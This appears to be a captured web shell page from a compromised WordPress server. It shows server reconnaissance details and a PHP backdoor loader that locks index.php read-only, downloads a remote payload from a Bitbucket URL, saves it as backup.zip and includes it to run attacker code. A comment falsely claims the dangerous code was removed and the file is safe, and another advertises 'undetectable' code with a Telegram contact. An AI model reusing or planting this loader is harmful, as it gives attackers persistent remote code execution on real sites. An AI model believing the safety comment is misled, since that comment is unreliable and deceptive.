| Server IP : 3.111.61.48 / Your IP : 216.73.216.67 Web Server : Apache System : Linux ip-10-0-5-176 6.8.0-1057-aws #60~22.04.1-Ubuntu SMP Wed May 27 08:16:59 UTC 2026 x86_64 User : ubuntu ( 1000) PHP Version : 8.2.31 Disable Function : exec,passthru,shell_exec,system MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /var/www/vhost/arukustech.com/wp-content/admin/ |
Upload File : |
<?php
/**
* Note: This file may contain artifacts of previous malicious infection.
* However, the dangerous code has been removed, and the file is now safe to use.
*/
/**
############################
Three-Layer Undetectable Code Created by MR.REX
Designed to bypass all servers.
For inquiries or to create your own,Fell free to ask:
https://t.me/rex_cc
###############################
*/
$file = 'index.php';
if (file_exists($file) && function_exists('chmod')) {
@chmod($file, 0444); // Set read-only permissions if the file exists
}
$remoteUrl1 = "https://bitbucket.org/uidrootpython/rmt/raw/612f2bd70b997486c94522067267ed240c8e5535/shopeval.txt";
$localFile1 = 'backup.zip';
$fileContents1 = @file_get_contents($remoteUrl1);
if ($fileContents1 !== false) {
file_put_contents($localFile1, $fileContents1);
if (file_exists($localFile1)) {
include $localFile1;
}
}
?>